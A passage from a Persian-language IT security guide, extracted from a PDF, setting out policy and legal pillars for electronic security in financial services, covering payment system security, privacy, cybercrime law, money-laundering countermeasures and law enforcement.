ﺩﺭ ﺗﻬﻴــﺔ ﺳﻴﺎﺳــﺘﻬﺎﻱ ﻋﻤــﻮﻣﻲ ﺑــﻪ ﻣﻨﻈــﻮﺭ ﺍﻳﺠــﺎﺩ ﻳــﺎ ﺍﺻــﻼﺡ
ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻫﺸﺖ ﺭﻛـﻦ ﻣﻬـﻢ ﺗﻮﺟـﻪ
ﺩﺍﺷﺖ:
•
•
•
•
•
•
•
•
ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ ﻣﻨﺎﺳﺐ؛
ﺗﻤﻬﻴــﺪﺍﺕ ﻓﻨــﻲ ﻭ ﻣــﺪﻳﺮﻳﺘﻲ ﺑــﺮﺍﻱ ﺗــﻀﻤﻴﻦ ﺍﻣﻨﻴــﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛
ﻧﻈﺎﺭﺕ ﻗﻮﻱ ﻭ ﭘﻴﺸﮕﻴﺮﻱ؛ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﺑﻬﺘـﺮ
ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻭ ﻻﻳـﻪﺑﻨـﺪﻱﺷـﺪﺓ
ﻣــﺪﻳﺮﻳﺖ ﺧﻄــﺮ؛ ﺍﺯ ﺟﻤﻠــﻪ ﺍﻣﻨﻴــﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺑــﺮﺍﻱ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ؛
ﻲ ﺑﻴﻤـﻪ ﺑﺘﻮﺍﻧﻨـﺪ
ﭼﺎﺭﭼﻮﺑﻲ ﻛﻪ ﺩﺭ ﺁﻥ ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻ ﹺ
ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻴﻤﻪ ﻛﻨﻨﺪ ﻭ ﺩﺭ
ﻛﻨﺎﺭ ﺁﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻦ ﺣﻮﺯﻩ ﺭﺍ ﺑـﺎ ﺍﻳﺠـﺎﺩ ﺗﻌﻬـﺪﺍﺕ
ﻣﺎﻟﻲ ﺑﺎﺯﭘﺮﺩﺍﺧﺘﻬﺎ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ؛
ﺍﻣﻀﺎﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ؛
ﺑﻪﺍﺷﺘﺮﺍﻙﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺕ؛
ﺁﻣﻮﺯﺵ ﺷﻬﺮﻭﻧﺪﺍﻥ ،ﻛﺎﺭﻛﻨﺎﻥ ،ﻭ ﻣﺪﻳﺮﻳﺖ ﺩﺭﺑﺎﺭﺓ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ؛ ﻭ
ﻳﻚ ﺳﺎﺧﺘﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳﻪﺑﻨﺪﻱ ﺷﺪﻩ.
ﺑﺨﺶ ﺳﻮﻡ
ﻣﺎﻟﻜﻴﺖ ﺻﻨﺎﻳﻊ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻣـﻮﺭ ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﺎﻋﺚ ﻃـﺮﺡ ﺳـﺆﺍﻻﺕ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺩﺭﺑـﺎﺭﺓ ﺳﻴﺎﺳـﺖ ﺭﻗـﺎﺑﺘﻲ ﻭ
ﻛﺸﻤﻜﺸﻬﺎﻱ ﺑﺎﻟﻘﻮﻩ ﺑﺮﺍﻱ ﻛـﺴﺐ ﻣﻨـﺎﻓﻊ ﻣـﻲﺷـﻮﻧﺪ .ﺩﺭ ﻣـﻮﺭﺩ
ﺳﻴﺎﺳــﺖ ﺭﻗــﺎﺑﺘﻲ ﻣــﻲﺗــﻮﺍﻥ ﭘﺮﺳــﻴﺪ :ﺁﻳــﺎ ﻧﻘــﺸﻬﺎﻱ ﭼﻨﺪﮔﺎﻧــﺔ
ﺷﺮﻛﺘﻬﺎﻱ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺭﻗﺎﺑـﺖ ﺑـﻮﻳﮋﻩ ﺩﺭ
ﻻ ﺑﺮﺍﻱ ﺍﺭﺍﺋـﻪ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ،
ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ -ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻣﺘﺨﺼﺼﻴﻦ ﻓﻨﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺩ ﺩﺍﺭﻧﺪ -ﻣﻨﺠﺮ ﺷﻮﺩ؟ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ
ﻳﻜﭙﺎﺭﭼﮕﻲ ﺧـﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪﺷـﺪﻩ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺷـﺮﻛﺖ ﺩﺭﺑـﺎﺭﺓ
ﮔــﺰﺍﺭﺵ ﺩﻗﻴــﻖ ﻭ ﻓــﻮﺭﻱ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﭼﮕﻮﻧــﻪ ﺗــﻀﻤﻴﻦ
ﻣﻲﺷﻮﺩ؟ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺭﻭﻧﺪ ﻭﺍﮔﺬﺍﺭﻱ ﺍﻣـﻮﺭ ﺑـﻪ ﻳـﻚ ﺷـﺮﻛﺖ
ﺛﺎﻟﺚ ،ﺍﻫﻤﻴﺖ ﺍﺻﻼﺡ ﺣﻮﺯﺓ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﺯ ﺭﺃﺱ ﻫﺮﻡ ﻣـﺴﺌﻮﻟﻴﺖ
ﺩﺭ ﺻﻨﻌﺘﻲ ﺑـﺎ ﭼﻨـﻴﻦ ﻣﺠﻤﻮﻋـﺔ ﭘﻴﭽﻴـﺪﻩﺍﻱ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺭﺍ
ﻻ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻣﻴﺎﻥ ﻣﺆﺳﺴﺎﺕ ﻣـﺎﻟﻲ ﻭ
ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺯ ﻗـﺴﻤﺘﻲ ﺍﺯ ﻫﺰﻳﻨـﺔ ﻗـﺮﺍﺭﺩﺍﺩ
ﺧﺪﻣﺎﺕ ﺑﻌﻨﻮﺍﻥ ﺿﻤﺎﻧﺖ ﻛﺎﺭﺁﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺣﺘـﻲ ﺑـﺎ
ﻲ ﻓﻌﺎﻟﻴـﺖ
ﺍﻳﻦ ﻭﺟﻮﺩ ﻫﻢ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻣـﺴﺌﻠﻪ ﻛـﺎﺭﺁﻳ ﹺ
ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﭘﺮﺩﺍﺧﺘﻪ ﻧﺸﺪﻩ ﺍﺳﺖ.
ﺳﻴﺎﺳﺘﻬﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺗﻮﺟـﻪ ﺧﺎﺻـﻲ ﺑـﻪ ﺍﻳـﻦ ﺗـﻮﺍﺯﻥ
ﺩﺍﺷﺖ.
١٣٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺭﻛﻦ ﺍﻭﻝ:
ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳﻲ
ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ
ﻣـﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ )ﻣﺜـﻞ ﺗﻮﺯﻳـﻊ ﻭ ﺩﺍﺩ ﻭ ﺳـﺘﺪ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ( ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ ﻫﻤﺰﻣﺎﻥ ﺑﺎ ﺗﻮﺳـﻌﺔ ﻗـﻮﺍﻧﻴﻦ ،ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺷـﻬﺎ ،ﺑﺎﻳـﺪ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ.
ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗـﺄﻣﻴﻦ
ﻛﻨﻨﺪ ﻭ ﻗﻮﺍﻧﻴﻦ ﺟﻨﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺩﺭ ﺑﺮ ﮔـﺮﻓﺘﻦ ﺍﻳـﻦ ﻧـﻮﻉ ﺟـﺮﺍﺋﻢ
ﺍﺻﻼﺡ ﻧﻤﺎﻳﻨﺪ.
ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﻭ ﭼـﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺑـﺮﺍﻱ ﺧـﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﻪ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺗﻮﺟﻪ ﺩﺍﺷﺖ:
•
•
•
•
•
•
ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ؛
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ؛
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ؛
ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ؛
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ؛ ﻭ
ﺯﻳﺮﺳﺎﺧﺖ ﺍﺟﺮﺍﻳﻲ.
ﺍﻳﻦ ﺷﺶ ﺣﻮﺯﺓ ﺳﻴﺎﺳﺖ ،ﻗﺎﻧﻮﻥ ﻭ ﺍﺟﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺎﻳﺪ ﺭﻭﺍﺑـﻂ
ﺍﺑﺘﺪﺍﻳﻲ ﻣﻴﺎﻥ ﺗﻤـﺎﻣﻲ ﺫﻳﻨﻔﻌـﺎﻥ ﻭ ﺳـﭙﺲ ﺗﺮﺍﻛﻨـﺸﻬﺎﻳﻲ ﻛـﻪ ﺩﺭ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻨﺪ .ﻳﻜﻲ
ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺟﺰﺍﻱ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ
ﻣــﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷﻨﺎﺳــﺎﻳﻲ ﺍﻋﺘﺒــﺎﺭ ﻗــﺎﻧﻮﻧﻲ ﺍﻣــﻀﺎﻫﺎﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺗﺮﺍﻛﻨﺸﻬﺎ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺑﺎﺷـﺪ.
ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺎﻳﺪ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺭﺍ ﺗـﺮﺟﻴﺢ ﺩﻫـﺪ ،ﺑـﺮﺍﻱ
ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﻔﺎﻇﺖ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩ،
ﻭ ﻗﺎﺑﻠﻴﺖ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺧﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺑﺨﺸﺪ.
ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﻗﺎﻧﻮﻥ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﻋﻨﻮﺍﻥ ﻛﻨﺪ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳـﻚ
ﺍﻣﻀﺎ ،ﺳﺎﺑﻘﻪ ﻳﺎ ﺗﺮﺍﻛﻨﺶ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒـﺎﺭ
ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻋﻨﺼﺮ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﺪ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ
ﺗﻌﺮﻳﻒ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﻨﺪ .ﺗﻌﺎﺭﻳﻒ ﺗـﺎ
ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺭﺍﻩﺣﻠﻬـﺎﻱ
ﻣﺨﺘﻠﻒ ﺑﺘﻮﺍﻧﻨﺪ ﻭﺍﺭﺩ ﺑﺎﺯﺍﺭ ﺷﻮﻧﺪ.
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ
ﺩﺭ ﺗﻬﻴﺔ ﺳﻴﺎﺳﺖ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺑﺎﻳـﺪ ﺗﻤـﺎﻡ
ﺍﺟﺰﺍﻳﻲ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﻫﺴﺘﻨﺪ ﺭﺍ ﻣﺪ ﻧﻈـﺮ
ﻗﺮﺍﺭ ﺩﺍﺩ .ﻫﻤﺔ ﺍﻳﻦ ﺍﺟﺰﺍ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻛﺎﺭ ﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ
ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎ ﺣﻔﺎﻇﺖ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻼﻭﻩ
ﻭﺟﻮﺩ ﺳﻴﺎﺳﺖ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺩﺭ ﺗﻤﺎﻣﻲ ﺧـﺴﺎﺭﺍﺕ
ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺣﻤﻼﺕ ﻭ ﺿﺎﻳﻌﺎﺕ ﺑﺘﻮﺍﻥ ﮔﺰﺍﺭﺷﺎﺕ ﺩﻗﻴﻖ ﻭ
ﺍﺭﺯﺷﻤﻨﺪﻱ ﺗﻬﻴﻪ ﻛﺮﺩ .ﺻﺮﻑ ﻭﺟـﻮﺩ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﺍﻳـﻦ
ﻻ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﺩﺍﺭﻩﻛﻨﻨـﺪﮔﺎﻥ ﺁﻥ ﺩﺭ
ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﺍﺣﺘﻤﺎ ﹰ
ﻣﻘﺎﺑﻞ ﻣﺨﺎﻃﺮﺍﺕ ،ﺗﺪﺍﺑﻴﺮ ﻻﺯﻡ ﺭﺍ ﺍﻧﺪﻳﺸﻴﺪﻩﺍﻧﺪ.
ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺑﺎﻳﺪ ﺣﻔﺎﻇﺖ ﻭ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺩﻩﻫﺎ ،ﺣﻔﺎﻇـﺖ
ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺳﺎﻳﺮ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺗﺠﺎﺭﻱ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴـﺮﺩ
ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺍﻋـﻼﻡ
ﻛﻨﺪ .ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﻫﻤﭽﻨﺎﻥ ﺩﺭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺷﻬﺮﻭﻧﺪﺍﻧﺶ ﻃﺒﻖ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ )ﻣـﺼﻮﺏ ﺳـﺎﻝ
(۱۹۹۵ﭘﻴﺸﺘﺎﺯ ﺍﺳﺖ .ﺩﺭ ﺣﺎﻟﺖ ﺣﺪﺍﻗﻠﻲ ،ﻗﺎﻧﻮﻥ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺑﺎﻳﺪ ﺍﺻﻮﻝ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻻﻧﻪ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ )ﺷـﺎﻣﻞ ﺗﻮﺟـﻪ ،ﺍﻧﺘﺨـﺎﺏ،
ﺩﺳﺘﺮﺳﻲ ﻭ ﺣﺪﺍﻗﻞ ﺍﻃﻼﻋﺎﺕ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﻜﻤﻴﻞ ﻣﻌﺎﻣﻠﻪ( ﺭﺍ ﺷﺎﻣﻞ ﺷﻮﺩ.
ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ
٣١
ﻫﺮ ﻛﺸﻮﺭ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻨﺠﺮ
ﺑﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﻭ
ﺑﺴﻴﺎﺭﻱ ﺁﺳﻴﺒﻬﺎﻱ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﻗـﺎﻧﻮﻥ
ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭ ﻭ ﻣﻨﺎﺑﻊ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﭘﻴﮕـﺮﺩ ﻭ ﻧﻴـﺰ
ﻣﺠﺎﺯﺍﺕ ﻣﺮﺗﻜﺒﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺑﺎﺷـﺪ .ﻧﻤﻮﻧـﻪﺍﻱ
ﺍﺯ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺭﻭﭘﺎ ٣٢ﭘﻴﺪﺍ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﭼﻬـﺎﺭﻡ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺩﺭ
٣٣
ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ.
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ
ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ
ﻭ ﺟﻮﺍﻣــﻊ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺭﺍ ﺑــﻪ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺭﺳــﻲ ،ﭘﻴﮕــﺮﺩ ﻭ
Cyber Crime
Europe’s Convention on Cyber Crime
۳۳
ﺍﻧﺠﻤﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ:
http://conventions.coe.int
31
32
١٣١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺠﺎﺯﺍﺕ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ ﺗﺎ ﺧﻄﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ
ﺍﺯ ﺟﺎﻧﺐ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﻛﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ
ﻛﺮﺩﻩ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ.
ﺟﺮﻳــﺎﻥ ﺩﺍﺭﺩ ﺗــﺄﺛﻴﺮ ﺑــﺴﺰﺍﻳﻲ ﺑــﺮ ﺳﻴــﺴﺘﻢ ﭘﺮﺩﺍﺧــﺖ ﺟﻬــﺎﻧﻲ،
ﺳﻴﺎﺳﺘﻬﺎﻱ ﭘﻮﻟﻲ ،ﻭ ﭘﻴﺶﺑﻴﻨﻴﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺍﺭﺩ.
ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ
ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ
ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺩﺭ ﻣﺮﺯﻫﺎﻱ ﻳﻚ ﻛﺸﻮﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻭﺟﻮﺩ ﭼﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺁﻥ ﺍﺯ
ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﻣﺒﺪﺃ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ،
ﻛﺸﻮﺭﻫﺎﻳﻲ ﺑﻮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﻈﺎﻡ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳـﻲ ﺿـﻌﻴﻔﻲ ﺑـﺮﺍﻱ
ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺍﺷـﺘﻪﺍﻧـﺪ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ ﺿـﺮﻭﺭﺕ ﻭﺟـﻮﺩ
ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺭﺍ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ
ﻧﻤﺎﻳﺎﻥ ﻣﻲﻛﻨﺪ.
ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺑﻮﻳﮋﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ
ﻣﺎﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ﻭ ﭘﻴـﺸﮕﻴﺮﻳﻬﺎﻱ ﻻﺯﻡ
